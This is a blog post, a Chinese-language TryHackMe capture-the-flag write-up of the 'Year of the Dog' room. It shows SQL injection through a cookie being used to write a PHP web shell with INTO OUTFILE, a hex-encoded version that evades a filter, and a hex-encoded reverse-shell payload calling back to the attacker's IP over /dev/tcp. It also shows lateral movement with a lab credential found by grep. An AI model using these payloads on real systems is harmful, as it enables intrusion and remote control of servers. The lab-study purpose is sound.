noone___'s blog
0%

THM打靶日寄21-Year of the Dog

发表于 更新于 分类于
克制一下,不要老想着用21年的CVE打20年的房间

  • 扫描打点

    • 80

      扫一下没东西,F12 也没

      但抓包看到有个 cookie ,但我并没有登录

      cookie 处有 sql 注入,order by 出来是两个字段

  • sql 注入写马拿 shell

    但由于没有登录入口,这里爆出来密码也没什么用,考虑仿照 holo 那样用 sql 来写马:

    1
    UNION SELECT 1,'<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php' -- -

    逮捕啊嗯

    考虑用 hex 绕一下

    1
    UNION SELECT 1,unhex('3c3f7068702024636d643d245f4745545b22636d64225d3b73797374656d2824636d64293b3f3e') INTO OUTFILE '/var/www/html/noone.php'-- -

    然后发现rce的反弹 shell 连不上,考虑直接传个上去

    1
    UNION SELECT 1,unhex('3c3f706870206578656328222f62696e2f62617368202d63202762617368202d69203e202f6465762f7463702f31302e31302e31322e38372f3132333420303e26312722293b203f3e') INTO OUTFILE '/var/www/html/reverse2.php'-- -

  • 文件内敏感信息横向

    研究下横向:从 /home 中看到要横向到 dylan

    切到他的目录看看,发现一个 work_analysis

    grep -Ri dylan 2>/dev/null 来搜索关于 dylan 的地方:

    这个地方长得像账密,即 dylan:Labr4d0rs4L1f3

    直接登上去

  • 提权

    不会,看 wp

    ss -tul